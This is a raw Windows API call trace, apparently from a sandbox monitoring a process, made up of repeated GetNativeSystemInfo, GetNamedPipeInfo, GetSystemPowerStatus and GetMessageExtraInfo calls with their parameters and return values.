	[0169.602] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.602] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.602] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.602] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.603] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.604] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.604] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.604] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.604] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.604] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.604] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.604] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.605] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.605] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.605] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.605] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.605] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.605] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.605] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.605] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.605] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.605] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.605] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.605] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.606] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.606] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.606] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.606] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.606] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.606] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.606] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.606] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.606] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.606] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.606] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.607] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.607] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.607] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.607] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.607] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.607] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.607] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.607] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.607] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.607] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.607] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.607] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.608] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0171.631] GetMessageExtraInfo () returned 0x0
	[0171.631] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.631] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.631] GetMessageExtraInfo () returned 0x0
	[0171.631] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.631] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.631] GetMessageExtraInfo () returned 0x0
	[0171.631] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.631] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.631] GetMessageExtraInfo () returned 0x0
	[0171.631] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.631] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.631] GetMessageExtraInfo () returned 0x0
	[0171.631] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.631] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.631] GetMessageExtraInfo () returned 0x0
	[0171.632] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.632] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.632] GetMessageExtraInfo () returned 0x0
	[0171.632] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.632] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.632] GetMessageExtraInfo () returned 0x0
	[0171.632] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.632] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.632] GetMessageExtraInfo () returned 0x0
	[0171.632] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.632] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.632] GetMessageExtraInfo () returned 0x0
	[0171.632] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.632] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.632] GetMessageExtraInfo () returned 0x0
	[0171.632] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.632] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.632] GetMessageExtraInfo () returned 0x0
	[0171.632] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.632] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.632] GetMessageExtraInfo () returned 0x0
	[0171.632] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.632] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.632] GetMessageExtraInfo () returned 0x0
	[0171.632] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.632] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.632] GetMessageExtraInfo () returned 0x0
	[0171.632] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0171.632] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0171.632] GetMessageExtraInfo () returned 0x0
